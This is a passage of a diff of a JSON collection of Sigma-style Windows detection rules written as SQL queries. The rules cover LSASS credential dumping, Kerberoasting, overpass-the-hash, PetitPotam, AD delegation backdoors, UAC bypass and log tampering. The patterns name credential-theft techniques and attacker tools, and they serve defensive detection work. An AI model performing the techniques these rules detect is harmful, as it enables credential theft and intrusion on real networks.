ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR 
NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE 
'%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded 
.NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "title": "Security Event Log Cleared", + "id": 
"a122ac13-daf8-4175-83a2-72c387be339d", "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "author": "Saw Winn Naung", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" + "attack.t1070.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_event_log_cleared.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "status": "test", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND 
ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "status": "test", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE 
'%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "User Added to Local Administrators", + "id": "c265cf08-3f99-46c1-8d59-328247057d57", + "status": "stable", + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.privilege_escalation", + "attack.t1078", + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * 
FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_user_added_to_local_administrators.yml" }, { - "title": "PsExec Service File Creation", - "id": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", - "author": "Thomas Patzke", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_tool_psexec.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). 
These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + 
"author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.s0002", + "attack.t1550.002" + ], + "falsepositives": [ + "Runas command-line tool using /netonly parameter" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + ], + "filename": "win_security_overpass_the_hash.yml" + }, + { + "title": "SCM Database Privileged Operation", + "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "status": "test", + "description": "Detects non-system users performing privileged operation os the SCM database", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "tags": [ + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_scm_database_privileged_operation.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + 
"description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Faulty legacy applications" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - 
"attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": 